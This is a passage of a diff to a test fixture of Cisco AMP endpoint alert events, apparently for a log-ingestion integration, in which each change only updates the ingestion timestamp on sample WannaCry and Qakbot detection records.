":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -1370,7 +1370,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461543700Z", + "ingested": "2021-12-14T14:40:57.457048119Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -1473,7 +1473,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461549500Z", + "ingested": "2021-12-14T14:40:57.457048481Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -1551,7 +1551,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461555300Z", + "ingested": "2021-12-14T14:40:57.457048949Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -1627,7 +1627,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461561100Z", + "ingested": "2021-12-14T14:40:57.457049392Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260893", "kind": "alert", 
@@ -1703,7 +1703,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461566900Z", + "ingested": "2021-12-14T14:40:57.457049749Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648155", "kind": "alert", 
@@ -1781,7 +1781,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461572500Z", + "ingested": "2021-12-14T14:40:57.457050125Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qYf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\qYf.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1861,7 +1861,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461578400Z", + "ingested": "2021-12-14T14:40:57.457050480Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056774\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"4191700.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\4191700.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648147", "kind": "alert", 
@@ -1945,7 +1945,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461584400Z", + "ingested": "2021-12-14T14:40:57.457050945Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":398000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.DD6D4FEDD3-100.SBX.TG\",\"detection_id\":\"6411488666497056773\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2026,7 +2026,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:35:51.461608Z", + "ingested": "2021-12-14T14:40:57.457051424Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1493058569636000800,\"timestamp\":1610633340,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-14T14:09:00+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610633340,\"start_date\":\"2021-01-14T14:09:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4\"}}}}}", "code": "1107296274", "kind": "alert", @@ -2106,7 +2106,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461614400Z", + "ingested": "2021-12-14T14:40:57.457051953Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":611000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648155", "kind": "alert", 
@@ -2188,7 +2188,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461636400Z", + "ingested": "2021-12-14T14:40:57.457052306Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772016730014000,\"timestamp\":1610631960,\"timestamp_nanoseconds\":65000000,\"date\":\"2021-01-14T13:46:00+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772016730013699\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2268,7 +2268,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:51.461641200Z", + "ingested": "2021-12-14T14:40:57.457052666Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264772012435046000,\"timestamp\":1610631959,\"timestamp_nanoseconds\":940000000,\"date\":\"2021-01-14T13:45:59+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D5221F6847-100.SBX.TG\",\"detection_id\":\"6264772012435046402\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Unconfirmed 762952.crdownload\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\Unconfirmed 762952.crdownload\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", "code": "553648147", "kind": "alert", 
@@ -2342,7 +2342,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461646400Z", + "ingested": "2021-12-14T14:40:57.457053158Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":724000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", 
@@ -2434,7 +2434,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461651400Z", + "ingested": "2021-12-14T14:40:57.457053592Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":366000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741862\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", 
@@ -2529,7 +2529,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461655300Z", + "ingested": "2021-12-14T14:40:57.457053973Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", 
@@ -2619,7 +2619,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:51.461659900Z", + "ingested": "2021-12-14T14:40:57.457054388Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e